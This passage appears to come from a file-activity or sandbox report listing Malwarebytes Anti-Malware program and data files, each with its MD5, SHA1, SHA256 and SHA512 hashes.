| SHA512 | 9c35293c95c1a9141740ac99315605964aa37c4a42d3a11cae9e5649ff1427a9480d3d5e7f763212cf13db3511c5ea3c84e68f95f0067fe6339a9d3fb7b27c54 |
C:\Program Files\Malwarebytes\Anti-Malware\mbshlext.dll
| MD5 | b7e5071b317550d93258f7e1e13e7b6f |
| SHA1 | 2d08d78a5c29cf724bc523530d1a9014642bbc60 |
| SHA256 | 467de01d7cee7ec54166b80658ff22f9feebdb1c24eaf1629cf40e4124508064 |
| SHA512 | 9c35293c95c1a9141740ac99315605964aa37c4a42d3a11cae9e5649ff1427a9480d3d5e7f763212cf13db3511c5ea3c84e68f95f0067fe6339a9d3fb7b27c54 |
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\LicenseControllerImpl.dll
| MD5 | 1e102c36c622f1a221f9c7af8a96a6c2 |
| SHA1 | 0e350dfa57a7c2c8d4daddc77d4b9da539a917c9 |
| SHA256 | 0be22af897b18d15f739363d32ffdcd5f4cdf1e0973dd1dffb949ac3b64e2dca |
| SHA512 | 4c3262d53c9e9508dcaf70bf58c5c9a2b501274fabec186533e21ae6e988d0f54518672b60909901de79c5ade2f6b1d8d7bdc0b29b9150c94e7a28a3e85ef818 |
C:\Program Files\Malwarebytes\Anti-Malware\LicenseControllerImpl.dll
| MD5 | 1e102c36c622f1a221f9c7af8a96a6c2 |
| SHA1 | 0e350dfa57a7c2c8d4daddc77d4b9da539a917c9 |
| SHA256 | 0be22af897b18d15f739363d32ffdcd5f4cdf1e0973dd1dffb949ac3b64e2dca |
| SHA512 | 4c3262d53c9e9508dcaf70bf58c5c9a2b501274fabec186533e21ae6e988d0f54518672b60909901de79c5ade2f6b1d8d7bdc0b29b9150c94e7a28a3e85ef818 |
C:\ProgramData\Malwarebytes\MBAMService\config\LicenseConfig.json
| MD5 | f782ef057fc2e4a54c9f424413f277ae |
| SHA1 | 2a23622ec49268500afe42d9174ac86844f7298b |
| SHA256 | d620750c3fcc3f858e391996d1c37c1e7066c8133f0f16750db95d4a761ad6c1 |
| SHA512 | bb2dc0e456fe4d4820fbb8ba07b0935325b325a1ff4093e5a686088c2d44ae746b6c7c6a3ddceaacbd2cfa4cdd41341c2c70218e2eb67cceacd6cb395c43ca1a |
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\UpdateControllerImpl.dll
| MD5 | c1242a30d1eb5efc086797c7b05dcca5 |
| SHA1 | a43a4e6df9673e3c9783bd9f1af66f3b79c7a1c2 |
| SHA256 | f556d2524500661fb8710aeac582b08763a75380faf8c6bceabb31abff89edbe |
| SHA512 | 89e2ed95e778a93846fa71db9b81d64c6f1075d731f8f7aec61e5c913f1887540ff9ae2cd42e4c0cae934089b960276e0e3ea80e886de06d0aaf4734c7fdf77b |
C:\Program Files\Malwarebytes\Anti-Malware\UpdateControllerImpl.dll
| MD5 | c1242a30d1eb5efc086797c7b05dcca5 |
| SHA1 | a43a4e6df9673e3c9783bd9f1af66f3b79c7a1c2 |
| SHA256 | f556d2524500661fb8710aeac582b08763a75380faf8c6bceabb31abff89edbe |
| SHA512 | 89e2ed95e778a93846fa71db9b81d64c6f1075d731f8f7aec61e5c913f1887540ff9ae2cd42e4c0cae934089b960276e0e3ea80e886de06d0aaf4734c7fdf77b |
C:\ProgramData\Malwarebytes\MBAMService\config\UpdateControllerConfig.json
| MD5 | 6dbd996e0236e2b3dc6ac3454aeee68e |
| SHA1 | 7fccfb10547a9aa78bd81557fb6225b00cfe4ca8 |
| SHA256 | b8a554b45d7c6664454daf3c2dbe293f8d19cc859a2f9cc964b223e9a0c162f1 |
| SHA512 | 274c5c0362b082baa8aaad0cc6a1cea2bd80f6d4f13ac1aea8cbadfd0490898b3c1f8bb010365efdcb0d7e7f4638966c683032793895e75637502cb5737295e3 |
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\version.dat
| MD5 | bc1829ff624943dba1e2b0c486119585 |
| SHA1 | bfe8e65737fd67c3300b1a3b653f69473855f2c7 |
| SHA256 | 83856b2e251983352b0792e0c7584e03b2ab9885182bae1a29bddd391f9b58dc |
| SHA512 | d92cc3e309b8d99a17270b2211b67c98005bf52ef578ef047cf28a115d488c0aa57fc7e310aac3e0b47f78ace31c6bb2a1204ab327517abda6d663f66adcd004 |
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\pkgvers.dat
| MD5 | 18074b19515da6a6a2ef6cf45e840b52 |
| SHA1 | 44a5ea1137e12b4c2c4253f3c93fde14796c9f96 |
| SHA256 | 1b24c34b4bc74b640a1785debafc254872b17cbf670ef7d5a8411c0347544ca6 |
| SHA512 | b469191c3bebefe5d9b6056f9843c2d5000577a890d1db4335178480cca4b8feccbe6d24a77adcdd7aec58aaa557d843ceee03c279ae5fc1166b9f829d97c5fd |
C:\ProgramData\Malwarebytes\MBAMService\pkgvers.dat
| MD5 | 18074b19515da6a6a2ef6cf45e840b52 |
| SHA1 | 44a5ea1137e12b4c2c4253f3c93fde14796c9f96 |
| SHA256 | 1b24c34b4bc74b640a1785debafc254872b17cbf670ef7d5a8411c0347544ca6 |
| SHA512 | b469191c3bebefe5d9b6056f9843c2d5000577a890d1db4335178480cca4b8feccbe6d24a77adcdd7aec58aaa557d843ceee03c279ae5fc1166b9f829d97c5fd |
C:\ProgramData\Malwarebytes\MBAMService\config\UpdateControllerConfig.json.bak
| MD5 | 75da0d4903434d6f0fe12083a5ec0b69 |
| SHA1 | f790e283061b8a4cfbcffa2541b6b3f5e0e4f3e5 |
| SHA256 | e8e0961607bac30a26302dde3973ca5afbcf15a9550e51dc4091af3da7f2a2f9 |
| SHA512 | 988fa0a4e9bf320ba9cc858d626b7645b0a77774dff73cd865f1c0f7f0e985f1b082a22de1cf5d95900f1e0baf9295a928e3069b52d8c5cf1862dccba411e374 |
C:\ProgramData\Malwarebytes\MBAMService\config\UpdateControllerConfig.json.bak
| MD5 | 364876fe843a947e26b190667e3bc303 |
| SHA1 | fe0e964602f8e29a5e4aeb3019ce610252a5c1fb |
| SHA256 | e6ee482490676ebb60dbd6c4ad0cb9ef77bb8b65b67ba9df935b3454dcf4de4d |
| SHA512 | dcfa0ac3372cdd836995ece5914b9ab07c5d2085a244d2132cb1c9fbd6c6d4a9061bc97d09ea0d9ae168a56d2d16dad9c198902db52437acae00660a8e6c6c65 |
C:\ProgramData\Malwarebytes\MBAMService\config\UpdateControllerConfig.json
| MD5 | 53b0988cd11081cc94979369477a5e5d |
| SHA1 | 678c6a9262652a45ddd65b27a166275323ace62b |
| SHA256 | ebb7081eedd2b0baafcc73c195c6dab19dae1796cba0041075b7bbb1c7d3fd51 |
| SHA512 | fcf0dbe6517b59214328865b448011fb0e66c5fe95f3467df1a8ae643d571a1d65e66d056f9e9ab285587e5b47a2a47be91f89d686be4aa8dfb006be83304e06 |
C:\PROGRAMDATA\MALWAREBYTES\MBAMSERVICE\rules.mbdb
| MD5 | 290695e0da2d06daf3ec83ed74c62b1e |
| SHA1 | d5230cd7248173cfdb085676be454fea7cc40b2a |
| SHA256 | e708e9fa65efcb00f5771ac6ead3b39a051e38dc40f3fb6e787971ffc6e27fd7 |
| SHA512 | 76536a37d3bf8ae2f261d6ef33a2fc48fb10e2d4bbfb5bcf46cbfe49cf52424036a6b793901497d97703ed09d754cf39d91cf0f01cf8787dd0df9aee73536856 |
C:\PROGRAMDATA\MALWAREBYTES\MBAMSERVICE\rdefs.mbdb
| MD5 | 2f7423ca7c6a0f1339980f3c8c7de9f8 |
| SHA1 | 102c77faa28885354cfe6725d987bc23bc7108ba |
| SHA256 | 850a4ea37a0fd6f68bf95422d502b2d1257264eb90cc38c0a3b1b95aa375be55 |
| SHA512 | e922ac8a7a2cde6d387f8698207cf5efbd45b646986a090e3549d97a7d552dd74179bd7ac20b7d246ca49d340c4c168982c65b4749df760857810b2358e7eb69 |
C:\PROGRAMDATA\MALWAREBYTES\MBAMSERVICE\prot.mbdb
| MD5 | 546d9e30eadad8b22f5b3ffa875144bf |
| SHA1 | 3b323ffef009bfe0662c2bd30bb06af6dfc68e4d |
| SHA256 | 6089fbf0c0c1413f62e91dc9497bedc6d8a271e9dc761e20adc0dccf6f4a0c1f |
| SHA512 | 3478f5dcf7af549dd6fe48ad714604200de84a90120b16a32233b6d44fa7240f5f4e5fe803f54b86bbdfd10fa1bfdd88fb85eb6a78e23e426933f98d0a2565ec |
C:\PROGRAMDATA\MALWAREBYTES\MBAMSERVICE\clean.mbdb
| MD5 | 6f9b49be0223ac79a713fb1472f890bd |
| SHA1 | 6d89aea5a4823556b005a381b9334acb68a01210 |
| SHA256 | 33a14b9ff0c92254945b0495a822611a0170daf4c0ce0dc4203a181c678dbb78 |
| SHA512 | 7b8df6420fd719fccbe1c4a7874514362ca06e20cd12dc3f788ebaaa3150e301d0e975b50bb52d1bf99f7f835b1ebf45fadc53fe7be9fdf74777ff90c1ffd95f |
C:\PROGRAMDATA\MALWAREBYTES\MBAMSERVICE\mbdigsig2.dat
| MD5 | 7bc7edd4b9d67db19a5b82a609faa1dd |
| SHA1 | e5e4c523f048b152ffb17ab7292da84092aa15f9 |
| SHA256 | 3fdfb23410f2730aaf15e08a0a77a4407701bd935e223ff97e7ca1c5f21d9159 |
| SHA512 | 122a442182cd37db45bc2ae3c81cee35a279925582405d42d09b25091df337ea71b184ef12fb9f3df8f496f2e546babed992056f7abf1eba5e98b9be2d53abea |
C:\PROGRAMDATA\MALWAREBYTES\MBAMSERVICE\dbmanifest2.dat
| MD5 | 837a1910b55ca05e1a9df39f4339815f |
| SHA1 | 3fca05dbb2f7e0260fb109c72cb19defbb356e63 |
| SHA256 | 114b9e48630535cdd5381d65f543f52e73294eed8577a55718697f1d76ab9e85 |
| SHA512 | 7d5716b353b007c0a0f34fad484a72ef0e9b4dc0d1260b98a4b19c2c5d6f760799b58ef44e5246926d7e83a8d62c717dcecbc5df175285088bc0691a3c8d6bf3 |
C:\ProgramData\Malwarebytes\MBAMService\config\UpdateControllerConfig.json
| MD5 | 1db9fa09653bd40e9347cbd16134cd14 |
| SHA1 | 040b3cde61254e3ddf29d62194acb4c5a6932a4d |
| SHA256 | 25b798b7a793787b772296db40af15d02fb6bc41e1b67a4ad4a9b2a66caaf855 |
| SHA512 | b34a66bc56ea2b73727fe297a33efdb563dd3a9b6c193fc8a7a66bfdad525bd20d994e712b0d5bf8f8dfa210a28e52a554d83b1075cf9bcbe147c3b9f7e95275 |
C:\PROGRAMDATA\MALWAREBYTES\MBAMSERVICE\scan.mbdb
| MD5 | fd629a7744a8a982987e5853cbb8ba22 |
| SHA1 | 70ee4a789487c48c7cb6e18c759442825283daea |
| SHA256 | a14c9b4248982096de6ed3c32cbb21be99e4ca488c0d42452cd5c506e97e5acf |
| SHA512 | b28395947a7823f8ec47149a23ecdb849e081c0d463e4af5ce6db796dc143d5f0de0f0926c96e2c971371b66aa04f51682ce2e8ad7cd2b4010280967adf504ae |
C:\PROGRAMDATA\MALWAREBYTES\MBAMSERVICE\wprot2.mbdb
| MD5 | 6eee951d18f70fff2a512c8365ef9182 |
| SHA1 | cfb5f7b66fddf311023edc934732292b21305364 |
| SHA256 | d2199fa23fbe0651428896cb66cbf99357a55ffe62916e48287e6ae525fce0b6 |
| SHA512 | b7cccdb3878be4fcfa7cf3699f7e56006de60e99e326e6adf5694e14483852758d6d3c24be9028d2ee7ecdee489c5455a7574df3062901504ba44ec637ad268d |
C:\PROGRAMDATA\MALWAREBYTES\MBAMSERVICE\tids.mbdb
| MD5 | db3b61462e0ff450528e5dd2f0802413 |
| SHA1 | fcf8131b740e4cbb621d929d7e7727d662837511 |
| SHA256 | 627ba84b29dfba6ea50a9c23fe07ed4ab8a676cf1bc8104197a4909cdaa14a48 |
| SHA512 | 487713c8ad5966171a8a28b66414eebedf9f02ab9067ce357a1aa1ffd1f5a39b0f3aed069fdce8d29af908279a9fb6c1bced7a8abd8fd1238374a5ae97ad61f0 |
C:\PROGRAMDATA\MALWAREBYTES\MBAMSERVICE\dynconfig.dat
| MD5 | 10f23e7c8c791b91c86cd966d67b7bc7 |
| SHA1 | 3f596093b2bc33f7a2554818f8e41adbbd101961 |
| SHA256 | 008254ca1f4d6415da89d01a4292911de6135b42833156720a841a22685765dc |
| SHA512 | 2d1b21371ada038323be412945994d030ee8a9007db072484724616c8597c6998a560bc28886ebf89e2c8919fb70d76c98338d88832351823027491c98d48118 |
C:\PROGRAMDATA\MALWAREBYTES\MBAMSERVICE\Global.sr
| MD5 | 8bb892b7f81d7161d5d85e51fd1b7a2a |
| SHA1 | eb33a87ec3d98c923fec7d3b2e06b8dbee8892dd |
| SHA256 | 89a39421687a1cdd1bc86c4b4b30c7b291072d623d048019b107f0f9ef9b70b5 |
| SHA512 | 493228e1e6be38ddd801bf834cb567e013bad9c3b66e2448792021772ef57df46ec82239c085657f40c216a693caf50775836d25834914440d0d4ff69e603d55 |
C:\PROGRAMDATA\MALWAREBYTES\MBAMSERVICE\exclusions.txt
| MD5 | aef4eca7ee01bb1a146751c4d0510d2d |
| SHA1 | 5cf2273da41147126e5e1eabd3182f19304eea25 |
| SHA256 | 9e87e4c9da3337c63b7f0e6ed0eb71696121c74e18a5da577215e18097715e2f |
| SHA512 | d31d21e37b0048050b19600f8904354cff3f3ec8291c5a7a54267e14af9fb88dfb6d11e74a037cc0369ade8a8fb9b753861f3b3fb2219563e8ec359f66c042db |
C:\PROGRAMDATA\MALWAREBYTES\MBAMSERVICE\Global.nm
| MD5 | 50ab18bf9db8e057ebc7fa36e5d30bbb |
| SHA1 | 7ae11851be482ef8779c6b6941911080c6217bbd |
| SHA256 | b969dda90c2e56f9a0a00a0aa028850b940312f7e508819b72d2b0bbe4535469 |
| SHA512 | 056ac064d02619c6e2bd803c07a88e8293afdef08d81a301da1bfcb406af554d8644275778915ff80ddbf47cea09466f4b2b1877f7157798a8d98e8a2d864cc0 |
C:\ProgramData\Malwarebytes\MBAMService\lkg_db\BrowserSDKDLL.dll
| MD5 | 1ed53171d00f440f29a12f9beb84dac4 |
| SHA1 | 4d9a1e3579b0999f1ab2fa818b588411e9ee920c |
| SHA256 | e659e687a872050f9e65d78992d16bd9b393cf3f8e8c94e0e15fb42b7065327e |
| SHA512 | 17161cfc672d1b996b8af4ebac17f9a8a3807f38c9a23e2e5b4dadcd9a21c3a64faec9bf59147022a9df88b80f89300f1b537091289bd7a42806bd206a317e6e |
C:\ProgramData\Malwarebytes\MBAMService\lkg_db\sample.dll
| MD5 | 936021397e23fc913c55992ce9468913 |
| SHA1 | d65af889a379f2982b1ebf29d83d2783b9aa0ded |
| SHA256 | ce7bdd309701942d97bd8cd3c2455a8d37d93b4d9ce4c14986703daf46fab7fb |
| SHA512 | 4fb968bee32b5f2b5a5d1629ec2855dc0150ec6b753e83a457ec704350b1f219b5e1349a75ec41f94757d1ef2de9a020933f8e42566bf6123543b7709ecc3d74 |
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\sample.dll
| MD5 | 936021397e23fc913c55992ce9468913 |
| SHA1 | d65af889a379f2982b1ebf29d83d2783b9aa0ded |
| SHA256 | ce7bdd309701942d97bd8cd3c2455a8d37d93b4d9ce4c14986703daf46fab7fb |
| SHA512 | 4fb968bee32b5f2b5a5d1629ec2855dc0150ec6b753e83a457ec704350b1f219b5e1349a75ec41f94757d1ef2de9a020933f8e42566bf6123543b7709ecc3d74 |
C:\ProgramData\Malwarebytes\MBAMService\lkg_db\ig.exe
| MD5 | 14cd82fe89752e3723a9b42aaa68763a |
| SHA1 | ea407d8d7064581406eb1b14e0f01cee61afb252 |
| SHA256 | 60e6029bdf3a2d88772bd4ec3aea6b688505e7dfcb76ce371d6942e9de95ce04 |
| SHA512 | 16114ff38a2e2cc59a9bbf420304fda8e558022f385748a5f48c02f037cbe815221a1cb4f0ac1deeb408ebf66ee3e25c059b157c7cc5cb169dbac75a73694fdc |
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe
| MD5 | 14cd82fe89752e3723a9b42aaa68763a |
| SHA1 | ea407d8d7064581406eb1b14e0f01cee61afb252 |
| SHA256 | 60e6029bdf3a2d88772bd4ec3aea6b688505e7dfcb76ce371d6942e9de95ce04 |
| SHA512 | 16114ff38a2e2cc59a9bbf420304fda8e558022f385748a5f48c02f037cbe815221a1cb4f0ac1deeb408ebf66ee3e25c059b157c7cc5cb169dbac75a73694fdc |
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\BrowserSDKDLL.dll
| MD5 | 1ed53171d00f440f29a12f9beb84dac4 |
| SHA1 | 4d9a1e3579b0999f1ab2fa818b588411e9ee920c |
| SHA256 | e659e687a872050f9e65d78992d16bd9b393cf3f8e8c94e0e15fb42b7065327e |
| SHA512 | 17161cfc672d1b996b8af4ebac17f9a8a3807f38c9a23e2e5b4dadcd9a21c3a64faec9bf59147022a9df88b80f89300f1b537091289bd7a42806bd206a317e6e |
C:\ProgramData\Malwarebytes\MBAMService\lkg_db\MBAMCore.dll
| MD5 | b2216df400c3ef59f9406831ba7956b5 |
| SHA1 | 1e26588190fc8a608e773239d498ceb79a92fca3 |
| SHA256 | 1e429ee1da8a0fe6569673b7052c5f49c193aaa8f3152451f645539a431b792d |
| SHA512 | 3aa3c9ed3bcaa0f2b7c4de36f7a83e35e8abf63c972c8e5377915bed41a803ae516cf8ef14e9c455043dd1ae46e4aec1820fa3572e65d0c87a99eac1d43d1f40 |
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\MBAMCore.dll
| MD5 | b2216df400c3ef59f9406831ba7956b5 |
| SHA1 | 1e26588190fc8a608e773239d498ceb79a92fca3 |
| SHA256 | 1e429ee1da8a0fe6569673b7052c5f49c193aaa8f3152451f645539a431b792d |
| SHA512 | 3aa3c9ed3bcaa0f2b7c4de36f7a83e35e8abf63c972c8e5377915bed41a803ae516cf8ef14e9c455043dd1ae46e4aec1820fa3572e65d0c87a99eac1d43d1f40 |
C:\ProgramData\Malwarebytes\MBAMService\lkg_db\Actions.dll
| MD5 | 1eff53d95ecaf6bbfffe80d866d8e1dd |
| SHA1 | d7ef7d7c77fd04b2c0eb8c16bb3cd08057f6742f |
| SHA256 | 6dd748f7ca56125cbe158fa3612f08e7312ef58ad5375e6b7ab5532cc16ca0ac |
| SHA512 | c59b8e6f0b238a247e64b9c7bb42213dadac1dada63542830a6292361174c935c0c662b2d1aed3fb6100cc4993297b1eaf25e328f2b4613458c4ffca63b9f02d |
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\Actions.dll
| MD5 | 1eff53d95ecaf6bbfffe80d866d8e1dd |
| SHA1 | d7ef7d7c77fd04b2c0eb8c16bb3cd08057f6742f |
| SHA256 | 6dd748f7ca56125cbe158fa3612f08e7312ef58ad5375e6b7ab5532cc16ca0ac |
| SHA512 | c59b8e6f0b238a247e64b9c7bb42213dadac1dada63542830a6292361174c935c0c662b2d1aed3fb6100cc4993297b1eaf25e328f2b4613458c4ffca63b9f02d |
C:\ProgramData\Malwarebytes\MBAMService\lkg_db\dynconfig.dat
| MD5 | 10f23e7c8c791b91c86cd966d67b7bc7 |
| SHA1 | 3f596093b2bc33f7a2554818f8e41adbbd101961 |
| SHA256 | 008254ca1f4d6415da89d01a4292911de6135b42833156720a841a22685765dc |
| SHA512 | 2d1b21371ada038323be412945994d030ee8a9007db072484724616c8597c6998a560bc28886ebf89e2c8919fb70d76c98338d88832351823027491c98d48118 |
C:\ProgramData\Malwarebytes\MBAMService\lkg_db\mbdigsig2.dat
| MD5 | 7bc7edd4b9d67db19a5b82a609faa1dd |
| SHA1 | e5e4c523f048b152ffb17ab7292da84092aa15f9 |
| SHA256 | 3fdfb23410f2730aaf15e08a0a77a4407701bd935e223ff97e7ca1c5f21d9159 |
| SHA512 | 122a442182cd37db45bc2ae3c81cee35a279925582405d42d09b25091df337ea71b184ef12fb9f3df8f496f2e546babed992056f7abf1eba5e98b9be2d53abea |
C:\ProgramData\Malwarebytes\MBAMService\lkg_db\dbmanifest2.dat
| MD5 | 837a1910b55ca05e1a9df39f4339815f |
| SHA1 | 3fca05dbb2f7e0260fb109c72cb19defbb356e63 |
| SHA256 | 114b9e48630535cdd5381d65f543f52e73294eed8577a55718697f1d76ab9e85 |
| SHA512 | 7d5716b353b007c0a0f34fad484a72ef0e9b4dc0d1260b98a4b19c2c5d6f760799b58ef44e5246926d7e83a8d62c717dcecbc5df175285088bc0691a3c8d6bf3 |
C:\ProgramData\Malwarebytes\MBAMService\lkg_db\cfg.bin
| MD5 | 8fd13803b1e5f14b4d241facc601a170 |
| SHA1 | 7321eec794bc766d84d75bd0370a9f2e4d7abdf6 |
| SHA256 | 925d771b2643715b62ef720801dfa96047fff1ee70eabb244bed802234673717 |
| SHA512 | f5b3514258487f8576fe32a795eefcffef049c7d002a6abdca17383bba838c7a218be23ec6803dcefed615f40afc2ba4b15bf65c9a74c4f6bb891d15d02bfc22 |
C:\ProgramData\Malwarebytes\MBAMService\lkg_db\Global.nm
| MD5 | 50ab18bf9db8e057ebc7fa36e5d30bbb |
| SHA1 | 7ae11851be482ef8779c6b6941911080c6217bbd |
| SHA256 | b969dda90c2e56f9a0a00a0aa028850b940312f7e508819b72d2b0bbe4535469 |
| SHA512 | 056ac064d02619c6e2bd803c07a88e8293afdef08d81a301da1bfcb406af554d8644275778915ff80ddbf47cea09466f4b2b1877f7157798a8d98e8a2d864cc0 |
C:\ProgramData\Malwarebytes\MBAMService\lkg_db\Global.sr
| MD5 | 8bb892b7f81d7161d5d85e51fd1b7a2a |
| SHA1 | eb33a87ec3d98c923fec7d3b2e06b8dbee8892dd |
| SHA256 | 89a39421687a1cdd1bc86c4b4b30c7b291072d623d048019b107f0f9ef9b70b5 |
| SHA512 | 493228e1e6be38ddd801bf834cb567e013bad9c3b66e2448792021772ef57df46ec82239c085657f40c216a693caf50775836d25834914440d0d4ff69e603d55 |
C:\ProgramData\Malwarebytes\MBAMService\lkg_db\clean.mbdb
| MD5 | 6f9b49be0223ac79a713fb1472f890bd |
| SHA1 | 6d89aea5a4823556b005a381b9334acb68a01210 |
| SHA256 | 33a14b9ff0c92254945b0495a822611a0170daf4c0ce0dc4203a181c678dbb78 |
| SHA512 | 7b8df6420fd719fccbe1c4a7874514362ca06e20cd12dc3f788ebaaa3150e301d0e975b50bb52d1bf99f7f835b1ebf45fadc53fe7be9fdf74777ff90c1ffd95f |
C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe
| MD5 | 7f34dad4e136c6130a32e035befa9a52 |
| SHA1 | f06d24d798fdf43c04c5b0b9713253860f405511 |
| SHA256 | 943e93dda161b055724444b210696ca44f957eccdfe1e63c66b722fc4fc6bc63 |
| SHA512 | cd3b8c989618765ceea14dc37dbbb9e3421c0730cf2acc01acc5881442caa5a83730e919e6ac17cf5e97d853a4cc2bdbeae9e98cf7ab3a2c26cd41b10187e91c |
C:\ProgramData\Malwarebytes\MBAMService\lkg_db\wprot2.mbdb
| MD5 | 6eee951d18f70fff2a512c8365ef9182 |
| SHA1 | cfb5f7b66fddf311023edc934732292b21305364 |
| SHA256 | d2199fa23fbe0651428896cb66cbf99357a55ffe62916e48287e6ae525fce0b6 |
| SHA512 | b7cccdb3878be4fcfa7cf3699f7e56006de60e99e326e6adf5694e14483852758d6d3c24be9028d2ee7ecdee489c5455a7574df3062901504ba44ec637ad268d |
C:\ProgramData\Malwarebytes\MBAMService\lkg_db\exclusions.txt
| MD5 | aef4eca7ee01bb1a146751c4d0510d2d |
| SHA1 | 5cf2273da41147126e5e1eabd3182f19304eea25 |
| SHA256 | 9e87e4c9da3337c63b7f0e6ed0eb71696121c74e18a5da577215e18097715e2f |
| SHA512 | d31d21e37b0048050b19600f8904354cff3f3ec8291c5a7a54267e14af9fb88dfb6d11e74a037cc0369ade8a8fb9b753861f3b3fb2219563e8ec359f66c042db |
C:\ProgramData\Malwarebytes\MBAMService\lkg_db\tids.mbdb
| MD5 | db3b61462e0ff450528e5dd2f0802413 |
| SHA1 | fcf8131b740e4cbb621d929d7e7727d662837511 |
| SHA256 | 627ba84b29dfba6ea50a9c23fe07ed4ab8a676cf1bc8104197a4909cdaa14a48 |
| SHA512 | 487713c8ad5966171a8a28b66414eebedf9f02ab9067ce357a1aa1ffd1f5a39b0f3aed069fdce8d29af908279a9fb6c1bced7a8abd8fd1238374a5ae97ad61f0 |
C:\ProgramData\Malwarebytes\MBAMService\lkg_db\scan.mbdb
| MD5 | fd629a7744a8a982987e5853cbb8ba22 |
| SHA1 | 70ee4a789487c48c7cb6e18c759442825283daea |
| SHA256 | a14c9b4248982096de6ed3c32cbb21be99e4ca488c0d42452cd5c506e97e5acf |
| SHA512 | b28395947a7823f8ec47149a23ecdb849e081c0d463e4af5ce6db796dc143d5f0de0f0926c96e2c971371b66aa04f51682ce2e8ad7cd2b4010280967adf504ae |
C:\ProgramData\Malwarebytes\MBAMService\lkg_db\rules.mbdb
| MD5 | 290695e0da2d06daf3ec83ed74c62b1e |
| SHA1 | d5230cd7248173cfdb085676be454fea7cc40b2a |
| SHA256 | e708e9fa65efcb00f5771ac6ead3b39a051e38dc40f3fb6e787971ffc6e27fd7 |
| SHA512 | 76536a37d3bf8ae2f261d6ef33a2fc48fb10e2d4bbfb5bcf46cbfe49cf52424036a6b793901497d97703ed09d754cf39d91cf0f01cf8787dd0df9aee73536856 |
C:\ProgramData\Malwarebytes\MBAMService\lkg_db\rdefs.mbdb
| MD5 | 2f7423ca7c6a0f1339980f3c8c7de9f8 |
| SHA1 | 102c77faa28885354cfe6725d987bc23bc7108ba |
| SHA256 | 850a4ea37a0fd6f68bf95422d502b2d1257264eb90cc38c0a3b1b95aa375be55 |
| SHA512 | e922ac8a7a2cde6d387f8698207cf5efbd45b646986a090e3549d97a7d552dd74179bd7ac20b7d246ca49d340c4c168982c65b4749df760857810b2358e7eb69 |
C:\ProgramData\Malwarebytes\MBAMService\lkg_db\prot.mbdb
| MD5 | 546d9e30eadad8b22f5b3ffa875144bf |
| SHA1 | 3b323ffef009bfe0662c2bd30bb06af6dfc68e4d |
| SHA256 | 6089fbf0c0c1413f62e91dc9497bedc6d8a271e9dc761e20adc0dccf6f4a0c1f |
| SHA512 | 3478f5dcf7af549dd6fe48ad714604200de84a90120b16a32233b6d44fa7240f5f4e5fe803f54b86bbdfd10fa1bfdd88fb85eb6a78e23e426933f98d0a2565ec |
C:\PROGRAMDATA\MALWAREBYTES\MBAMSERVICE\cfg.bin
| MD5 | 8fd13803b1e5f14b4d241facc601a170 |
| SHA1 | 7321eec794bc766d84d75bd0370a9f2e4d7abdf6 |
| SHA256 | 925d771b2643715b62ef720801dfa96047fff1ee70eabb244bed802234673717 |
| SHA512 | f5b3514258487f8576fe32a795eefcffef049c7d002a6abdca17383bba838c7a218be23ec6803dcefed615f40afc2ba4b15bf65c9a74c4f6bb891d15d02bfc22 |
C:\Program Files\Malwarebytes\Anti-Malware\CloudControllerImpl.dll
| MD5 | a22f4dd3f75413faba618de10315540d |
| SHA1 | 450a9abff68ffb922abaa0ba193ea4ffc983e92b |
| SHA256 | 31d628b6c6c58d76dbd8071e155c9bfef575444d3ce7fa83c2a0c3a16e67e7ea |
| SHA512 | b34bec558e556dc8602717fc8b2601f18d02217551bcb1b3d7df7f9574f7ddf46a29dcfe043119f353e1e258fdc1e9a6db6d38ce8e5f3eda9fdb92216a31ccd6 |
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\CloudControllerImpl.dll
| MD5 | a22f4dd3f75413faba618de10315540d |
| SHA1 | 450a9abff68ffb922abaa0ba193ea4ffc983e92b |
| SHA256 | 31d628b6c6c58d76dbd8071e155c9bfef575444d3ce7fa83c2a0c3a16e67e7ea |
| SHA512 | b34bec558e556dc8602717fc8b2601f18d02217551bcb1b3d7df7f9574f7ddf46a29dcfe043119f353e1e258fdc1e9a6db6d38ce8e5f3eda9fdb92216a31ccd6 |
C:\ProgramData\Malwarebytes\MBAMService\config\CloudConfig.json
| MD5 | 236da06c4a81e4134f6239c5441a8bd8 |
| SHA1 | 9f4f1f515cdf8f84196b7e230879cf3d9edc56c8 |
| SHA256 | a4a53cd357e1a2ac8c2df731dfc3365762f1296b629c647cae23ebc3291e0102 |
| SHA512 | 89847e2379190f5b80d7aa748503b9946e185d0e559125202a95bb922faec96f4f53d577d6a2ebd62fc16545eab46492136c5ceecc0cf6cdbf6d1c7925b1d4ce |
C:\ProgramData\Malwarebytes\MBAMService\config\LicenseConfig.json
| MD5 | 7fef9a28c867802bffa102557ea24553 |
| SHA1 | 9c0339d6ca53cb80cbcb9e7891def5542a0c3748 |
| SHA256 | 135bb3902a12e2fd2b5857f8756be7899c630949770cc80d3f96d17f9ef7bb99 |
| SHA512 | 0916c655bd7bdfd3fbc81416a52594e8b3a1cbf7ce382612dacf5544947256319aea779edd559c639341c62dda19f84c87429e9ae78251e74b90103a73bd0878 |
C:\ProgramData\Malwarebytes\MBAMService\config\TelemCtrlConfig.json
| MD5 | 35267c451101468e67309ec3d9c31a22 |
| SHA1 | eef64b479c9f251541636baf551c6154aa5aa8ed |
| SHA256 | cb0dd7e6e9b47e2bf228053805c5bcdf747af78efdbd75ef76ef60d84cca4972 |
| SHA512 | 4e9b7538297677dc89d11db1d5641f82a80ed4d0d69bda19bb0057671b23f93750814f532cfac5ec1cb17ed5c75c19120433037296068e6ac7caca7087fd2ebb |
C:\ProgramData\Malwarebytes\MBAMService\config\CleanControllerConfig.json
| MD5 | c39d5283ffc593d0552d254da37d322a |
| SHA1 | d942d1253a45a52180c1ff814d16ebf8284a03dc |
| SHA256 | d4830de819010073e86e06e17224daf90239481a522bc94ece999063c84a9312 |
